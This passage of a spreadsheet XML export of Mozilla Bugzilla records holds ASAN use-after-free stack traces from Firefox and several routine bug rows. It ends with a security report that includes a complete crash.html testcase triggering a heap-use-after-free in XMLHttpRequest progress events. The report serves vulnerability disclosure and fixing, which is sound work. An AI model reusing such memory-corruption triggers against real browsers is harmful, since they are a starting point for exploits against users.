    #1 0x7f189583d1be in imgRequestProxy::Notify(int, mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const*) /home/worker/workspace/build/src/image/imgRequestProxy.cpp:790:3
    #2 0x7f18957f7ee9 in operator() /home/worker/workspace/build/src/image/ProgressTracker.cpp:315:42
    #3 0x7f18957f7ee9 in void mozilla::image::ImageObserverNotifier&lt;mozilla::image::ObserverTable const*&gt;::operator()&lt;void mozilla::image::SyncNotifyInternal&lt;mozilla::image::ObserverTable const*&gt;(mozilla::image::ObserverTable const* const&amp;, bool, unsigned int, mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;)::{lambda(mozilla::image::IProgressObserver*)#1}&gt;(void mozilla::image::SyncNotifyInternal&lt;mozilla::image::ObserverTable const*&gt;(mozilla::image::ObserverTable const* const&amp;, bool, unsigned int, mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;)::{lambda(mozilla::image::IProgressObserver*)#1}) /home/worker/workspace/build/src/image/ProgressTracker.cpp:274
    #4 0x7f18957f7b80 in void mozilla::image::SyncNotifyInternal&lt;mozilla::image::ObserverTable const*&gt;(mozilla::image::ObserverTable const* const&amp;, bool, unsigned int, mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;) /home/worker/workspace/build/src/image/ProgressTracker.cpp:315:5
    #5 0x7f18957f3c31 in operator() /home/worker/workspace/build/src/image/ProgressTracker.cpp:394:5
    #6 0x7f18957f3c31 in Read&lt;(lambda at /home/worker/workspace/build/src/image/ProgressTracker.cpp:393:19)&gt; /home/worker/workspace/build/src/image/CopyOnWrite.h:154
    #7 0x7f18957f3c31 in mozilla::image::ProgressTracker::SyncNotifyProgress(unsigned int, mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;) /home/worker/workspace/build/src/image/ProgressTracker.cpp:393
    #8 0x7f18957fbade in mozilla::image::RasterImage::NotifyProgress(unsigned int, mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, mozilla::Maybe&lt;unsigned int&gt; const&amp;, mozilla::image::DecoderFlags, mozilla::image::SurfaceFlags) /home/worker/workspace/build/src/image/RasterImage.cpp:1567:3
    #9 0x7f1895805ab8 in mozilla::image::RasterImage::NotifyDecodeComplete(mozilla::image::DecoderFinalStatus const&amp;, mozilla::image::ImageMetadata const&amp;, mozilla::image::DecoderTelemetry const&amp;, unsigned int, mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, mozilla::Maybe&lt;unsigned int&gt; const&amp;, mozilla::image::DecoderFlags, mozilla::image::SurfaceFlags) /home/worker/workspace/build/src/image/RasterImage.cpp:1607:3
    #10 0x7f18958792b9 in operator() /home/worker/workspace/build/src/image/IDecodingTask.cpp:87:5
    #11 0x7f18958792b9 in mozilla::detail::RunnableFunction&lt;mozilla::image::IDecodingTask::NotifyDecodeComplete(mozilla::NotNull&lt;mozilla::image::RasterImage*&gt;, mozilla::NotNull&lt;mozilla::image::Decoder*&gt;)::$_2&gt;::Run() /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:324
    #12 0x7f18931a38bb in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1216:7
    #13 0x7f18932259fc in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/glue/nsThreadUtils.cpp:361:10
    #14 0x7f1893fdd40f in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/glue/MessagePump.cpp:96:21
    #15 0x7f1893f4efc8 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:232:3
    #16 0x7f1893f4efc8 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:225
    #17 0x7f1893f4efc8 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:205
    #18 0x7f189957819f in nsBaseAppShell::Run() /home/worker/workspace/build/src/widget/nsBaseAppShell.cpp:156:3
    #19 0x7f189b5f2451 in nsAppStartup::Run() /home/worker/workspace/build/src/toolkit/components/startup/nsAppStartup.cpp:283:19
    #20 0x7f189b789757 in XREMain::XRE_mainRun() /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4488:10
    #21 0x7f189b78aecd in XREMain::XRE_main(int, char**, nsXREAppData const*) /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4621:8
    #22 0x7f189b78bd8c in XRE_main /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4712:16
    #23 0x4df91a in do_main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:282:10
    #24 0x4df91a in main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:415
    #25 0x7f18aeb5282f in __libc_start_main /build/glibc-9tT8Do/glibc-2.23/csu/../csu/libc-start.c:291
    #26 0x41ba88 in _start (/home/nils/fuzzer3/esr/firefox/firefox+0x41ba88)
0x602000457ab8 is located 8 bytes inside of 16-byte region [0x602000457ab0,0x602000457ac0)
freed by thread T0 here:
    #0 0x4b21db in __interceptor_free /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:38:3
    #1 0x7f1895b30123 in operator delete /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:218:12
    #2 0x7f1895b30123 in nsImageLoadingContent::RemoveObserver(imgINotificationObserver*) /home/worker/workspace/build/src/dom/base/nsImageLoadingContent.cpp:432
    #3 0x7f189a1813b2 in nsImageFrame::DestroyFrom(nsIFrame*) /home/worker/workspace/build/src/layout/generic/nsImageFrame.cpp:213:7
    #4 0x7f189a003de3 in nsFrameList::DestroyFramesFrom(nsIFrame*) /home/worker/workspace/build/src/layout/generic/nsFrameList.cpp:57:5
    #5 0x7f189a004207 in DestroyAbsoluteFrames /home/worker/workspace/build/src/layout/generic/nsContainerFrame.cpp:184:5
    #6 0x7f189a004207 in nsContainerFrame::DestroyFrom(nsIFrame*) /home/worker/workspace/build/src/layout/generic/nsContainerFrame.cpp:218
    #7 0x7f189a064f15 in nsCanvasFrame::DestroyFrom(nsIFrame*) /home/worker/workspace/build/src/layout/generic/nsCanvasFrame.cpp:153:3
    #8 0x7f189a004378 in DestroyFramesFrom /home/worker/workspace/build/src/layout/generic/nsFrameList.cpp:57:5
    #9 0x7f189a004378 in nsContainerFrame::DestroyFrom(nsIFrame*) /home/worker/workspace/build/src/layout/generic/nsContainerFrame.cpp:221
    #10 0x7f189a0782ca in Destroy /home/worker/workspace/build/src/layout/generic/nsIFrame.h:576:20
    #11 0x7f189a0782ca in nsContainerFrame::RemoveFrame(mozilla::layout::FrameChildListID, nsIFrame*) /home/worker/workspace/build/src/layout/generic/nsContainerFrame.cpp:170
    #12 0x7f1899ea5566 in nsFrameManager::RemoveFrame(mozilla::layout::FrameChildListID, nsIFrame*) /home/worker/workspace/build/src/layout/base/nsFrameManager.cpp:506:5
    #13 0x7f1899d73b6b in nsCSSFrameConstructor::ContentRemoved(nsIContent*, nsIContent*, nsIContent*, nsCSSFrameConstructor::RemoveFlags, bool*, nsIContent**) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:8498:5
    #14 0x7f1899ce862e in nsCSSFrameConstructor::RecreateFramesForContent(nsIContent*, bool, nsCSSFrameConstructor::RemoveFlags, nsIContent**) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:9685:10
    #15 0x7f1899d7572a in nsCSSFrameConstructor::MaybeRecreateContainerForFrameRemoval(nsIFrame*, nsCSSFrameConstructor::RemoveFlags, nsresult*, nsIContent**) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:9475:16
    #16 0x7f1899ce82ca in nsCSSFrameConstructor::RecreateFramesForContent(nsIContent*, bool, nsCSSFrameConstructor::RemoveFlags, nsIContent**) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:9659:16
    #17 0x7f1899d754de in nsCSSFrameConstructor::MaybeRecreateContainerForFrameRemoval(nsIFrame*, nsCSSFrameConstructor::RemoveFlags, nsresult*, nsIContent**) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:9428:18
    #18 0x7f1899ce82ca in nsCSSFrameConstructor::RecreateFramesForContent(nsIContent*, bool, nsCSSFrameConstructor::RemoveFlags, nsIContent**) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:9659:16
    #19 0x7f1899d754de in nsCSSFrameConstructor::MaybeRecreateContainerForFrameRemoval(nsIFrame*, nsCSSFrameConstructor::RemoveFlags, nsresult*, nsIContent**) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:9428:18
    #20 0x7f1899d733cb in nsCSSFrameConstructor::ContentRemoved(nsIContent*, nsIContent*, nsIContent*, nsCSSFrameConstructor::RemoveFlags, bool*, nsIContent**) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:8370:9
    #21 0x7f1899f33ec2 in PresShell::ContentRemoved(nsIDocument*, nsIContent*, nsIContent*, int, nsIContent*) /home/worker/workspace/build/src/layout/base/nsPresShell.cpp:4477:3
    #22 0x7f1895f491fe in nsNodeUtils::ContentRemoved(nsINode*, nsIContent*, int, nsIContent*) /home/worker/workspace/build/src/dom/base/nsNodeUtils.cpp:226:3
    #23 0x7f1895ef1540 in nsINode::doRemoveChildAt(unsigned int, bool, nsIContent*, nsAttrAndChildArray&amp;) /home/worker/workspace/build/src/dom/base/nsINode.cpp:1926:5
    #24 0x7f1895c39cf3 in mozilla::dom::FragmentOrElement::RemoveChildAt(unsigned int, bool) /home/worker/workspace/build/src/dom/base/FragmentOrElement.cpp:1113:5
    #25 0x7f18959f54ed in nsContentUtils::SetNodeTextContent(nsIContent*, nsAString_internal const&amp;, bool) /home/worker/workspace/build/src/dom/base/nsContentUtils.cpp:4818:7
    #26 0x7f1895e0bea6 in nsDocument::SetTitle(nsAString_internal const&amp;) /home/worker/workspace/build/src/dom/base/nsDocument.cpp:6683:10
    #27 0x7f18980420dc in mozilla::dom::MediaDocument::UpdateTitleAndCharset(nsACString_internal const&amp;, nsIChannel*, char const* const*, int, int, nsAString_internal const&amp;) /home/worker/workspace/build/src/dom/html/MediaDocument.cpp:415:5
    #28 0x7f189803c961 in mozilla::dom::ImageDocument::UpdateTitleAndCharset() /home/worker/workspace/build/src/dom/html/ImageDocument.cpp:794:3
    #29 0x7f189803e128 in mozilla::dom::ImageDocument::OnSizeAvailable(imgIRequest*, imgIContainer*) /home/worker/workspace/build/src/dom/html/ImageDocument.cpp:551:3
    #30 0x7f189803dd4c in mozilla::dom::ImageDocument::Notify(imgIRequest*, int, mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const*) /home/worker/workspace/build/src/dom/html/ImageDocument.cpp:479:12
    #31 0x7f189803eecf in non-virtual thunk to mozilla::dom::ImageDocument::Notify(imgIRequest*, int, mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const*) /home/worker/workspace/build/src/dom/html/ImageDocument.cpp:474:16
    #32 0x7f1895b2c390 in nsImageLoadingContent::Notify(imgIRequest*, int, mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const*) /home/worker/workspace/build/src/dom/base/nsImageLoadingContent.cpp:157:9
    #33 0x7f189583d1be in imgRequestProxy::Notify(int, mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const*) /home/worker/workspace/build/src/image/imgRequestProxy.cpp:790:3
previously allocated by thread T0 here:
    #0 0x4b24fb in malloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:52:3
    #1 0x4e0ded in moz_xmalloc /home/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:83:17
    #2 0x7f1895b2f9fd in operator new /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:194:12
    #3 0x7f1895b2f9fd in nsImageLoadingContent::AddObserver(imgINotificationObserver*) /home/worker/workspace/build/src/dom/base/nsImageLoadingContent.cpp:401
    #4 0x7f189a1824fd in nsImageFrame::Init(nsIContent*, nsContainerFrame*, nsIFrame*) /home/worker/workspace/build/src/layout/generic/nsImageFrame.cpp:270:3
    #5 0x7f1899d559a4 in InitAndRestoreFrame /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:4971:3
    #6 0x7f1899d559a4 in nsCSSFrameConstructor::ConstructFrameFromItemInternal(nsCSSFrameConstructor::FrameConstructionItem&amp;, nsFrameConstructorState&amp;, nsContainerFrame*, nsFrameItems&amp;) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:3875
    #7 0x7f1899d62996 in nsCSSFrameConstructor::ConstructFramesFromItem(nsFrameConstructorState&amp;, nsCSSFrameConstructor::FrameConstructionItemList::Iterator&amp;, nsContainerFrame*, nsFrameItems&amp;) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:6187:3
    #8 0x7f1899d57c1b in ConstructFramesFromItemList /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:10631:5
    #9 0x7f1899d57c1b in nsCSSFrameConstructor::ConstructFrameFromItemInternal(nsCSSFrameConstructor::FrameConstructionItem&amp;, nsFrameConstructorState&amp;, nsContainerFrame*, nsFrameItems&amp;) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:4022
    #10 0x7f1899d62996 in nsCSSFrameConstructor::ConstructFramesFromItem(nsFrameConstructorState&amp;, nsCSSFrameConstructor::FrameConstructionItemList::Iterator&amp;, nsContainerFrame*, nsFrameItems&amp;) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:6187:3
    #11 0x7f1899d3f104 in ConstructFramesFromItemList /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:10631:5
    #12 0x7f1899d3f104 in nsCSSFrameConstructor::ProcessChildren(nsFrameConstructorState&amp;, nsIContent*, nsStyleContext*, nsContainerFrame*, bool, nsFrameItems&amp;, bool, PendingBinding*, nsIFrame*) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:10843
    #13 0x7f1899d578e1 in nsCSSFrameConstructor::ConstructFrameFromItemInternal(nsCSSFrameConstructor::FrameConstructionItem&amp;, nsFrameConstructorState&amp;, nsContainerFrame*, nsFrameItems&amp;) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:4026:9
    #14 0x7f1899d62996 in nsCSSFrameConstructor::ConstructFramesFromItem(nsFrameConstructorState&amp;, nsCSSFrameConstructor::FrameConstructionItemList::Iterator&amp;, nsContainerFrame*, nsFrameItems&amp;) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:6187:3
    #15 0x7f1899d57c1b in ConstructFramesFromItemList /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:10631:5
    #16 0x7f1899d57c1b in nsCSSFrameConstructor::ConstructFrameFromItemInternal(nsCSSFrameConstructor::FrameConstructionItem&amp;, nsFrameConstructorState&amp;, nsContainerFrame*, nsFrameItems&amp;) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:4022
    #17 0x7f1899d62996 in nsCSSFrameConstructor::ConstructFramesFromItem(nsFrameConstructorState&amp;, nsCSSFrameConstructor::FrameConstructionItemList::Iterator&amp;, nsContainerFrame*, nsFrameItems&amp;) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:6187:3
    #18 0x7f1899d3f104 in ConstructFramesFromItemList /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:10631:5
    #19 0x7f1899d3f104 in nsCSSFrameConstructor::ProcessChildren(nsFrameConstructorState&amp;, nsIContent*, nsStyleContext*, nsContainerFrame*, bool, nsFrameItems&amp;, bool, PendingBinding*, nsIFrame*) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:10843
    #20 0x7f1899d499ed in nsCSSFrameConstructor::ConstructBlock(nsFrameConstructorState&amp;, nsIContent*, nsContainerFrame*, nsContainerFrame*, nsStyleContext*, nsContainerFrame**, nsFrameItems&amp;, nsIFrame*, PendingBinding*) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:11853:3
    #21 0x7f1899d45e48 in nsCSSFrameConstructor::ConstructDocElementFrame(mozilla::dom::Element*, nsILayoutHistoryState*) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:2625:5
    #22 0x7f1899d69076 in nsCSSFrameConstructor::ContentRangeInserted(nsIContent*, nsIContent*, nsIContent*, nsILayoutHistoryState*, bool) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:7744:7
    #23 0x7f1899ce88db in ContentInserted /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:7630:10
    #24 0x7f1899ce88db in nsCSSFrameConstructor::RecreateFramesForContent(nsIContent*, bool, nsCSSFrameConstructor::RemoveFlags, nsIContent**) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:9699
    #25 0x7f1899d069e6 in mozilla::RestyleManagerBase::ProcessRestyledFrames(nsStyleChangeList&amp;) /home/worker/workspace/build/src/layout/base/RestyleManagerBase.cpp:1176:7
    #26 0x7f1899d0d8f9 in ProcessOneRestyle /home/worker/workspace/build/src/layout/base/RestyleTracker.cpp:105:5
    #27 0x7f1899d0d8f9 in mozilla::RestyleTracker::DoProcessRestyles() /home/worker/workspace/build/src/layout/base/RestyleTracker.cpp:266
    #28 0x7f1899cef7c4 in ProcessRestyles /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RestyleManager.h:490:7
    #29 0x7f1899cef7c4 in mozilla::RestyleManager::ProcessPendingRestyles() /home/worker/workspace/build/src/layout/base/RestyleManager.cpp:834
    #30 0x7f1899f30f1e in ProcessPendingRestyles /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RestyleManagerHandleInlines.h:74:3
    #31 0x7f1899f30f1e in PresShell::FlushPendingNotifications(mozilla::ChangesToFlush) /home/worker/workspace/build/src/layout/base/nsPresShell.cpp:4159
    #32 0x7f1899c4321c in nsRefreshDriver::Tick(long, mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:1836:11
    #33 0x7f1899c4fa61 in mozilla::RefreshDriverTimer::TickRefreshDrivers(long, mozilla::TimeStamp, nsTArray&lt;RefPtr&lt;nsRefreshDriver&gt; &gt;&amp;) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:295:7
    #34 0x7f1899c4f4f5 in mozilla::RefreshDriverTimer::Tick(long, mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:316:5
    #35 0x7f1899c5201e in applyImpl&lt;mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver, void (mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::*)(mozilla::TimeStamp), StoreCopyPassByValue&lt;mozilla::TimeStamp&gt; , 0&gt; /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:775:12
    #36 0x7f1899c5201e in apply&lt;mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver, void (mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::*)(mozilla::TimeStamp)&gt; /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:781
    #37 0x7f1899c5201e in mozilla::detail::RunnableMethodImpl&lt;void (mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::*)(mozilla::TimeStamp), true, false, mozilla::TimeStamp&gt;::Run() /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:810
    #38 0x7f18931a38bb in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1216:7
    #39 0x7f18932259fc in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/glue/nsThreadUtils.cpp:361:10
    #40 0x7f1893fdd40f in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/glue/MessagePump.cpp:96:21
    #41 0x7f1893f4efc8 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:232:3
    #42 0x7f1893f4efc8 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:225
    #43 0x7f1893f4efc8 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:205
SUMMARY: AddressSanitizer: heap-use-after-free /home/worker/workspace/build/src/dom/base/nsImageLoadingContent.cpp:155:24 in nsImageLoadingContent::Notify(imgIRequest*, int, mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const*)
Shadow bytes around the buggy address:
  0x0c0480082f00: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd
  0x0c0480082f10: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd
  0x0c0480082f20: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd
  0x0c0480082f30: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd
  0x0c0480082f40: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd
=&gt;0x0c0480082f50: fa fa fd fd fa fa fd[fd]fa fa fd fd fa fa fd fd
  0x0c0480082f60: fa fa fd fa fa fa fd fa fa fa fd fd fa fa fd fd
  0x0c0480082f70: fa fa fd fa fa fa fd fa fa fa fd fd fa fa fd fd
  0x0c0480082f80: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd
  0x0c0480082f90: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd
  0x0c0480082fa0: fa fa fd fd fa fa fd fd fa fa fd fd fa fa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364==ABORTING</t>
        </is>
      </c>
      <c r="X5623" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5624">
      <c r="A5624" t="n">
        <v>297742</v>
      </c>
      <c r="B5624" t="inlineStr">
        <is>
          <t>2005-06-14 23:01:34 -0700</t>
        </is>
      </c>
      <c r="C5624" t="inlineStr">
        <is>
          <t>Status Update for 2.20rc1 and 2.18.2</t>
        </is>
      </c>
      <c r="D5624" t="inlineStr">
        <is>
          <t>2005-07-08 14:18:44 -0700</t>
        </is>
      </c>
      <c r="E5624" t="n">
        <v>1</v>
      </c>
      <c r="F5624" t="n">
        <v>1</v>
      </c>
      <c r="G5624" t="n">
        <v>4</v>
      </c>
      <c r="H5624" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I5624" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J5624" t="inlineStr">
        <is>
          <t>bugzilla.org</t>
        </is>
      </c>
      <c r="K5624" t="inlineStr">
        <is>
          <t>2.19.3</t>
        </is>
      </c>
      <c r="L5624" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5624" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5624" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5624" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5624" t="inlineStr"/>
      <c r="Q5624" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5624" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S5624" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5624" t="n">
        <v>1</v>
      </c>
      <c r="U5624" t="n">
        <v>0</v>
      </c>
      <c r="V5624" t="n">
        <v>15</v>
      </c>
      <c r="W5624" t="inlineStr">
        <is>
          <t>We need a Status Update for these two releases. The only big news should be
"Yay, we're more stable!"</t>
        </is>
      </c>
      <c r="X5624" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5625">
      <c r="A5625" t="n">
        <v>1613226</v>
      </c>
      <c r="B5625" t="inlineStr">
        <is>
          <t>2020-02-04 12:39:03 -0800</t>
        </is>
      </c>
      <c r="C5625" t="inlineStr">
        <is>
          <t>Remove python@2 from brew packages in bootstrap</t>
        </is>
      </c>
      <c r="D5625" t="inlineStr">
        <is>
          <t>2020-02-10 13:36:47 -0800</t>
        </is>
      </c>
      <c r="E5625" t="n">
        <v>1</v>
      </c>
      <c r="F5625" t="n">
        <v>1</v>
      </c>
      <c r="G5625" t="n">
        <v>7</v>
      </c>
      <c r="H5625" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I5625" t="inlineStr">
        <is>
          <t>Firefox Build System</t>
        </is>
      </c>
      <c r="J5625" t="inlineStr">
        <is>
          <t>Bootstrap Configuration</t>
        </is>
      </c>
      <c r="K5625" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5625" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5625" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5625" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5625" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5625" t="inlineStr"/>
      <c r="Q5625" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R5625" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5625" t="inlineStr">
        <is>
          <t>mozilla75</t>
        </is>
      </c>
      <c r="T5625" t="n">
        <v>1</v>
      </c>
      <c r="U5625" t="n">
        <v>0</v>
      </c>
      <c r="V5625" t="n">
        <v>4</v>
      </c>
      <c r="W5625" t="inlineStr">
        <is>
          <t>This is being removed soon (Feb 10th). I was just able to bootstrap without it without issue, there's a comment about mercurial needing it, but that seems to no longer be the case, so I think the thing to do here is just remove it.</t>
        </is>
      </c>
      <c r="X5625" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5626">
      <c r="A5626" t="n">
        <v>1542465</v>
      </c>
      <c r="B5626" t="inlineStr">
        <is>
          <t>2019-04-05 23:36:15 -0700</t>
        </is>
      </c>
      <c r="C5626" t="inlineStr">
        <is>
          <t>use-after-free in mozilla::dom::XMLHttpRequestMainThread::DispatchProgressEvent</t>
        </is>
      </c>
      <c r="D5626" t="inlineStr">
        <is>
          <t>2024-05-30 09:58:05 -0700</t>
        </is>
      </c>
      <c r="E5626" t="n">
        <v>1</v>
      </c>
      <c r="F5626" t="n">
        <v>1</v>
      </c>
      <c r="G5626" t="n">
        <v>3</v>
      </c>
      <c r="H5626" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5626" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5626" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K5626" t="inlineStr">
        <is>
          <t>68 Branch</t>
        </is>
      </c>
      <c r="L5626" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5626" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5626" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5626" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5626" t="inlineStr">
        <is>
          <t>[fixed by bug 1545120][adv-main67+][adv-esr60.7+]</t>
        </is>
      </c>
      <c r="Q5626" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5626" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5626" t="inlineStr">
        <is>
          <t>mozilla68</t>
        </is>
      </c>
      <c r="T5626" t="n">
        <v>1</v>
      </c>
      <c r="U5626" t="n">
        <v>0</v>
      </c>
      <c r="V5626" t="n">
        <v>31</v>
      </c>
      <c r="W5626" t="inlineStr">
        <is>
          <t>Created attachment 9056314
crash.html (minimised testcase)
The following testcase crashes the latest ASAN build of Firefox 68.0a1 (SourceStamp=93075ec49df3982c26873b822d762bd3d8863fad). It requires a fuzzing build (--enable-fuzzing) and the pref `user_pref("fuzzing.enabled",true)`. I am using a Python2 webserver (`python -m SimpleHTTPServer`) to host the testcase.
crash.html:
```
&lt;script&gt;
function spin() {
    var x=new XMLHttpRequest();
    x.open("POST","https://mozilla.org/",false);
    try{x.send("X");}catch(e){}
}
function start() {
	o305=document.documentElement;
	o339=new XMLHttpRequest();
    o1155=new XMLHttpRequest();
	o339.open('GET','/a'+ "a".repeat(204811),true);
	o339.onreadystatechange=fun0;
	o339.send(undefined);
	o1537=o1155.upload;
	o1537.onprogress=fun1;
}
function fun0() {
    o1155.open('POST','/x' + "a".repeat(204811),true);
	o1155.send(o305);
}
function fun1() {
    window.dump(1);
	o1155.open('GET','/a'+'a'.repeat(101111),true);
	o1155.send(undefined);
    for(var x=0;x&lt;10;x++) spin();
    o1155 = null;
    o1537 = null;
    o339 = null;
    o305 = null;
    FuzzingFunctions.garbageCollect();FuzzingFunctions.cycleCollect();FuzzingFunctions.garbageCollect();FuzzingFunctions.cycleCollect();
}
&lt;/script&gt;
&lt;body onload="start()"&gt;&lt;/body&gt;
```
ASAN output:
=================================================================
==20801==ERROR: AddressSanitizer: heap-use-after-free on address 0x6170000c26c3 at pc 0x7f8f0918abbb bp 0x7ffe0541f310 sp 0x7ffe0541f308
WRITE of size 1 at 0x6170000c26c3 thread T0 (Web Content)
